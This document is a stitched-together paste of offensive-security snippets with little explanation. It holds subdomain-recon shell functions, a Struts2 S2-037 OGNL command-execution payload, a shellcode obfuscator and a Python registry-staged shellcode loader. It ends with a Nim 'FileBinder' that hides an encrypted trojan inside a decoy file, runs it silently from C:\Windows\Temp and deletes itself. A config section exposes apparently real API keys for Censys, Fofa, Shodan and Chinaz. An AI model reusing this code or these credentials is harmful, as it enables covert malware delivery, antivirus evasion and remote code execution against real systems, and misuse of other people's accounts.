python shellcode加载器

Recon() {
./assetfinder --subs-only  $1 > $1-assetfinder.txt;./ksubdomain -d $1 -silent -skip-wild -full -o $1-ksubdomain.txt;./subfinder -d $1 -all -silent > $1-subfinder.txt;./findomain -t $1 -q > $1-findomain.txt;./amass enum -passive -norecursive -noalts -d $1 -o $1-amass.txt;cat *.txt | sort | uniq > $1-basic;rm -rf *.txt
}
Mass() {
cp $1-basic ../subdomain2;cd ../subdomain2;altdns -i $1-basic -w words.dic -o $1-altdns.txt;cat $1-altdns.txt | ./massdns/bin/massdns -r ./massdns/lists/resolvers.txt  -t A  -o S -w $1_A_CNAME.txt;cat $1_A_CNAME.txt | sed 's/A.*//;  s/..$//;  s/CN.*//' > $1-massdns.txt;cat $1-basic $1-massdns.txt | sort | uniq > $1-all;rm -rf *.txt
}

3B822693-993e-1dac2-632e-b97337be0e4

docker pull medicean/vulapps:s_struts2_s2-037
docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
http://ip:80/orders/3/
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id

import random
import sys

string = '0123456789abcdef'
str_list = list(string)
random.shuffle(str_list)
string2 = ''.join(str_list)

a = open(sys.argv[1],'rb')
b = a.read().encode('hex')
list = []
for i in b:
    b = string2.find(i)
    list.append(b)


f = open('Offset_shellcode.py','w')
f.write("string = '{}'
".format(string2))
f.write("list = {}
".format(list))
f.write("buf = ''
for i in list:
	buf+=string[i]
shellcode=bytearray(buf.decode('hex'))
")

补丁网盘链接:
链接: https://pan.baidu.com/s/1vo_teu41pA-v9OYfC9wprQ 密码: ndao

# 模块API配置
# Censys可以免费注册获取API：https://censys.io/api
censys_api_id = '27006dda-b551-40cc-a592-a2577847c764'
censys_api_secret = 'vXob9EOio9V7w2jTtBrZdI1iyYNzblCJ'

# Binaryedge可以免费注册获取API：https://app.binaryedge.io/account/api
# 免费的API有效期只有1个月，到期之后可以再次生成，每月可以查询250次。
binaryedge_api = ''

# Chinaz可以免费注册获取API：http://api.chinaz.com/ApiDetails/Alexa
chinaz_api = 'df69b6ddcb634105b2d6599151d5b02b'

# Bing可以免费注册获取API：https://azure.microsoft.com/zh-cn/services/
# cognitive-services/bing-web-search-api/#web-json
bing_api_id = ''
bing_api_key = ''

# SecurityTrails可以免费注册获取API：https://securitytrails.com/corp/api
securitytrails_api = ''

# https://fofa.so/api
fofa_api_email = 'm13724810865_2@163.com'  # fofa用户邮箱
fofa_api_key = '1f8566b6d6c1e86d9622b14da3ee8d5d'  # fofa用户key

# Google可以免费注册获取API:
# 免费的API只能查询前100条结果
# https://developers.google.com/custom-search/v1/overview#search_engine_id
# 创建自定义搜索引擎后需要在响应的控制面板上启用Search the entire web
google_api_id = ''  # Google API自定义搜索引擎id
# https://developers.google.com/custom-search/v1/overview#api_key
google_api_key = ''  # Google API自定义搜索key

# https://api.passivetotal.org/api/docs/
riskiq_api_username = ''
riskiq_api_key = ''

# Shodan可以免费注册获取API: https://account.shodan.io/register
# 免费的API限速1秒查询1次
shodan_api_key = 'CID5rmCYAFd391vHGcLlALXUBjAIOU4V'
# ThreatBook API 查询子域名需要收费 https://x.threatbook.cn/nodev4/vb4/myAPI
threatbook_api_key = ''

# VirusTotal可以免费注册获取API: https://developers.virustotal.com/reference
virustotal_api_key = ''

# https://www.zoomeye.org/doc?channel=api
zoomeye_api_usermail = ''
zoomeye_api_password = ''

# Spyse可以免费注册获取API: https://spyse.com/
spyse_api_token = ''

# https://www.circl.lu/services/passive-dns/
circl_api_username = ''
circl_api_password = ''

# https://www.dnsdb.info/
dnsdb_api_key = ''

# ipv4info可以免费注册获取API: http://ipv4info.com/tools/api/
# 免费的API有效期只有2天，到期之后可以再次生成，每天可以查询50次。
ipv4info_api_key = ''

# https://github.com/360netlab/flint
# passivedns_api_addr默认空使用http://api.passivedns.cn
# passivedns_api_token可为空
passivedns_api_addr = ''
passivedns_api_token = ''

# Github Token可以访问https://github.com/settings/tokens生成,user为Github用户名
# 用于子域接管和子域收集
github_api_user = ''
github_api_token = ''

# obtain Cloudflare API key from https://dash.cloudflare.com/profile/api-tokens
cloudflare_api_token = ''

默认是x64位的msf

from ctypes import *
from ctypes import wintypes
import ctypes
buf =  b""
buf += b"x56xffxd5"

ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
data_len = wintypes.DWORD()
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

#author @evilash

import os
import base64
import strfmt
import osproc
import nimcrypto
import nimcrypto/sysrand

let help = """

  +-+-+-+-+-+-+-+-+-+-+-+-+-+
  |N i m F i l e B i n d e r|
  +-+-+-+-+-+-+-+-+-+-+-+-+-+ 
  @evilash

  It's a FileBinder writen by Nim
  And just a *rough* tool of learning Nim

  Usage:
    ./NimFileBinder <evil> <NormalFile> <key>
      -h,--help  : help
"""

func toByteSeq*(str: string): seq[byte] {.inline.} =
  ## Converts a string to the corresponding byte sequence.
  @(str.toOpenArrayByte(0, str.high))

proc EncryptFile(File1, File2, key: string): void = 
  var
   Content1 = readFile(File1)
   Content2 = readFile(File2)
   EnContent1 = encode(Content1)
   EnContent2 = encode(Content2)

  var
    data: seq[byte] = toByteSeq(decode(EnContent1))
    envkey: string = key

    ectx, dctx: CTR[aes256]
    key: array[aes256.sizeKey, byte]
    iv: array[aes256.sizeBlock, byte]
    plaintext = newSeq[byte](len(data))
    enctext = newSeq[byte](len(data))
    b64iv: string



  # Create Random IV
  discard randomBytes(addr iv[0], 16)
  # We do not need to pad data, `CTR` mode works byte by byte.
  copyMem(addr plaintext[0], addr data[0], len(data))

  # Expand key to 32 bytes using SHA256 as the KDF
  var expandedkey = sha256.digest(envkey)
  copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))

  ectx.init(key, iv)
  ectx.encrypt(plaintext, enctext)
  ectx.clear()

  b64iv = encode(iv)

  var B64EnCryContent: string = encode(enctext)

  var BinderTemplete: string = """

import base64
import winim
import encodings
import nimcrypto
import nimcrypto/sysrand
import os

func toByteSeq*(str: string): seq[byte] {} =
  ## Converts a string to the corresponding byte sequence.
  @(str.toOpenArrayByte(0, str.high))

var evilbase64 = "{}"

var data2: seq[byte] = toByteSeq(decode(evilbase64))

var BindFilebase64 = "{}"

var deb64iv = decode("{}")
var 
    envkey: string = "{}"
    dctx: CTR[aes256]
    key: array[aes256.sizeKey, byte]
    iv: array[aes256.sizeBlock, byte]
    crypttext = newSeq[byte]({})
    dectext = newSeq[byte]({})

copyMem(addr crypttext[0], addr data2[0], len(data2))

var expandedkey = sha256.digest(envkey)
copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
copyMem(addr iv[0], addr deb64iv[0], aes256.sizeBlock)

dctx.init(key, iv)
dctx.decrypt(crypttext, dectext)
dctx.clear()

let decoded_Bindfile = decode(BindFilebase64)

var evilname: string = "{}"
var Bindfilename: string = "{}"

writeFile(Bindfilename, decoded_Bindfile)   

var utf8evilname =convert(evilname,"GB2312","UTF-8")
var utf8Bindfilename =convert(Bindfilename,"GB2312","UTF-8")

WinExec("cmd /k start " & utf8Bindfilename, SW_HIDE); 
writeFile(r"C:\Windows\Temp\" & utf8evilname, dectext) 

#writeFile(r"C:\Windows\Temp\calc.txt" , dectext) 

#copyFile("C:\Windows\Temp\calc.txt", "C:\Windows\Temp\calc.exe")
#removeFile("C:\Windows\Temp\calc.txt")

WinExec("cmd /c C:\Windows\Temp\" & utf8evilname, SW_HIDE); 
#WinExec("cmd /c C:\Windows\Temp\calc.exe", SW_HIDE); 

ShellExecute(0, "open", "cmd.exe", "/c del " & paramStr(0), NULL, SW_HIDE)

#WinExec("cmd.exe /c del temp.exe", SW_HIDE)

""".fmt("{.inline.}", B64EnCryContent, EnContent2, b64iv, envkey, len(data), len(data), File1, File2)

  writeFile(r"outfile.nim", BinderTemplete)


proc CompileFile(): void = 
  let errC = execCmd("nim c --cpu:amd64 -d:mingw --app:gui -d:danger -d:strip --opt:size --passc=-flto --passl=-flto {}".fmt("outfile.nim"))
  var rmhandle = tryRemoveFile("outfile.nim")


proc main() =
  if paramCount() == 3:
    var
      TraojanFile: string = paramStr(1)
      NormalFile: string = paramStr(2)
      Enkey: string = paramStr(3)

    EncryptFile(TraojanFile, NormalFile, Enkey)
    CompileFile()
    return

  if paramCount() == 1 and (paramStr(1) == "-h" or paramStr(1) == "--help"):
    echo help
    return
  
  if paramCount() == 0:
    echo help
    return

  else:
    echo "  Expect two arguments
  ex: ./NimFileBinder <evil> <NormalFile> <key>"
    return
    

main()